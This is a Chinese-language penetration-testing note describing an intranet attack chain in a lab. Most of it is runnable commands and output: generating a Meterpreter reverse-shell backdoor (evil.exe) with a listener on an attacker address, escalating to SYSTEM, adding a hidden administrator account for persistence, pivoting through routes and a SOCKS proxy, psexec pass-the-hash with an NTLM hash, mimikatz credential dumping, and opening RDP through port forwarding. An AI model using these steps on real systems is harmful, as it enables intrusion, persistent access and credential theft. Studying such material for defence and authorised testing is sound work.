内网安全之：内网渗透流程

郑重声明：
本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。

1 前提

利用已经控制的一台计算机作为入侵内网的跳板，在其他内网计算机看来访问全部来自于跳板机(WEB Server)

2 实验环境

2.1 建立 meterpreter 反向连接

1. 生成 Metaspolit 后门程序

   msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
   

2. kali 配置监听 meterpreter 反向连接，并自动将恶意软件的进程迁移至 explorer.exe

   use exploit/multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost 192.168.0.2
   set autorunscript migrate -n explorer.exe
   run
   

3. WEB Server 下载 Metaspolit 后门程序，并打开程序

4. meterpreter 反向连接建立成功

   

2.2 收集信息提升权限

ipconfig      Display interfaces
route         View and modify the routing table
getuid        Get the user that the server is running as 查看当前用户
getprivs      Attempt to enable all privileges available to the current process 尽可能提升权限
getsystem     Attempt to elevate your privilege to that of local system. 通过各种攻击向量来提升本地系统权限
ps            List running processes 列出进程

2.3 持久后门: 添加隐藏用户

meterpreter > shell 
C:\Windows\system32>net user test$ 123456 /add & net localgroup administrators test$ /add

2.4 添加内网路由

meterpreter > run post/multi/manage/autoroute 

2.5 扫描内网存活主机

meterpreter > info post/multi/gather/ping_sweep 
meterpreter > run post/multi/gather/ping_sweep rhosts=10.2.1.1-10.2.1.5
meterpreter > run post/multi/gather/ping_sweep rhosts=10.2.1.0/24

2.6 扫描内网主机开放的端口

• 通过 MSF SOCKS 代理模块，用 nmap 扫描内网主机开放的端口

  msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy 
  

• 修改 proxychains 配置

  └─# mousepad /etc/proxychains.conf
  
  # socks4 	127.0.0.1 9050
  socks5 	127.0.0.1 1080
  

• 通过 NAMP 扫描内网主机开放的端口

  proxychains nmap -sV -sT -Pn -p 445 10.2.1.4
  

  

2.6.1 使用 SOCKS 后nmap 扫描报错

└─# proxychains nmap -sV -Pn 10.2.1.3
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-07 09:16 CST
**nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion `rc == 0' failed.**
zsh: abort      proxychains nmap -sV -Pn 10.2.1.3

解决方式：

• 关闭 proxychains 代理 DNS 功能

  └─# mousepad /etc/proxychains.conf
  # proxy_dns 
  

2.7 攻击内网主机

1. 配置 SMB 攻击模块

   msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec 
   msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
   payload => windows/meterpreter/bind_tcp
   msf6 exploit(windows/smb/psexec) > set rhosts 10.2.1.4
   rhosts => 10.2.1.4
   msf6 exploit(windows/smb/psexec) > set smbuser administrator
   smbuser => administrator
   msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
   smbpass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
   

   

2. 利用 SMB 攻击模块

   

3. 利用 kiwi(mimikatz) 进行信息收集

   meterpreter > load kiwi
   Kiwi Commands
   =============
   
   Command                Description
   -------                -----------
   creds_all              Retrieve all credentials (parsed)
   creds_kerberos         Retrieve Kerberos creds (parsed)
   creds_livessp          Retrieve Live SSP creds
   creds_msv              Retrieve LM/NTLM creds (parsed)
   creds_ssp              Retrieve SSP creds
   creds_tspkg            Retrieve TsPkg creds (parsed)
   creds_wdigest          Retrieve WDigest creds (parsed)
   dcsync                 Retrieve user account information via DCSync (unparsed)
   dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
   golden_ticket_create   Create a golden kerberos ticket
   kerberos_ticket_list   List all kerberos tickets (unparsed)
   kerberos_ticket_purge  Purge any in-use kerberos tickets
   kerberos_ticket_use    Use a kerberos ticket
   kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
   lsa_dump_sam           Dump LSA SAM (unparsed) 查看目标系统的 SAMdump：
   lsa_dump_secrets       Dump LSA secrets (unparsed) 查看目标系统的密码
   password_change        Change the password/hash of a user
   wifi_list              List wifi profiles/creds for the current user
   wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)
   
   

   

4. 开启远程桌面

   Usage: getgui -u  -p 
   Or:    getgui -e
   
   OPTIONS:
   
       -e        Enable RDP only.
       -f   Forward RDP Connection.
       -h        Help menu.
       -p   The Password of the user to add.
       -u   The Username of the user to add.
   

5. 远程连接内网服务器

   meterpreter > portfwd add  -l 13389 -p 3389 -r 10.2.1.4 
   
   ┌──(rootkali)-[~]
   └─# rdesktop -u administrator -p 123456 127.0.0.1:13389
   
   

   

6. 还可以利用前面配置的 SOCKS 代理模块远程连接内网服务器

   ┌──(rootkali)-[~]
   └─# proxychains rdesktop -u administrator -p 123456 10.2.1.4